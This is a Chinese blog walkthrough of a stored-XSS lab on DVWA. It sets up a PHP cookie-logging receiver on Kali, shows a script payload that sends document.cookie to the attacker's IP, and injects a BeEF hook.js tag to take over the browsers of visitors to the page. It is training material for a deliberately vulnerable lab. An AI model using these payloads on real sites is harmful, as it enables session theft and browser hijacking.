DVWA闯关XSS(Stored)番外篇

为了让实验效果更好一点,这里除了使用靶机(win2008的DVWA)之外,还要使用kali来做进攻者,来收集战果(cookie)

准备工作(手工搭建环境)

1:首先在你的kali上安装web服务
(如果你的web服务无法正常启用,也可以试试升级它)

sudo apt install apache2

2:启动web服务

systemctl start apache2.service

3:确认apache2是运行状态

systemctl status apache2.service

在这里插入图片描述
在这里插入图片描述
4:准备一个文件来接收cookie

sudo vim /var/www/html/cookie_rec.php

内容如下:

<?php
    $cookie=$_GET['cookie'];
    $log=fopen("cookie.txt","a");
    fwrite($log, $cookie . "\n");
    fclose($log);
?>

5:给目录权限,一会让它生成存放cookie的文件

sudo chown -R www-data.www-data /var/www/

6:渗透

<script>window.open('http://192.168.40.129/cookie_rec.php?cookie='+document.cookie)</script>
注:192.168.40.129是kali的ip
如果前面做了存储型XSS,请删干净,或者直接重置DVWA

7:解除长度限制,默认限制长度为50个字符
在这里插入图片描述
你可以现在kali上测试一下,正常情况下浏览器会出一个空白的新页面,这个时候你会发现/var/www/html目录下多了个cookie.txt,里面会记录你的cookie。确认这一点之后记得恢复环境!!!
(由于我测试了多次,所以cookie记录里面有三条记录)
在这里插入图片描述
在这里插入图片描述

渗透

1:在DVWA上植入XSS代码的时候,排个雷,实验没有效果的话,换个浏览器试试,这个跟浏览器的安全策略有关

我kali的火狐浏览器会出现一个弹窗并被拦截,放过那个弹窗即可 √
我物理机的火狐浏览器输入XSS代码时,无任何反应 ×
我物理机的Edge浏览器输入XSS代码时,直接弹到一个新的标签页 √

在这里插入图片描述
2:检查是否收到cookie
在这里插入图片描述

准备工作BeEF

记得重置DVWA的环境

启动apache和BeEF

systemctl start apache2.service
点一下BeEF图标启动BeEF

访问BeEF的web页面

http://192.168.40.129:3000/ui/panel

使用XSS

去靶机上填入BeEF自动生成的一个XSS代码

<script src="http://192.168.40.129:3000/hook.js"></script>

植入木马

考虑到前面使用火狐浏览器不大顺利,这次使用Edge
在这里插入图片描述

收到结果

在这里插入图片描述

扩大战果

因为这是存储型XSS,所以任何人访问DVWA的这个页面都会中招,那么这里就用kali去访问一下页面,只需要kali访问这个页面即可。
在这里插入图片描述
BeEF拿到战果,甚至显示出了kali的虚拟机标识,够智能

192.168.40.131表示它是万恶之源,我们拿到的战果都是因为它(131是DVWA的主机IP)
Edge是谷歌的开源 Chromium 内核重构浏览器
192.168.40.1是VM8网卡的IP

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值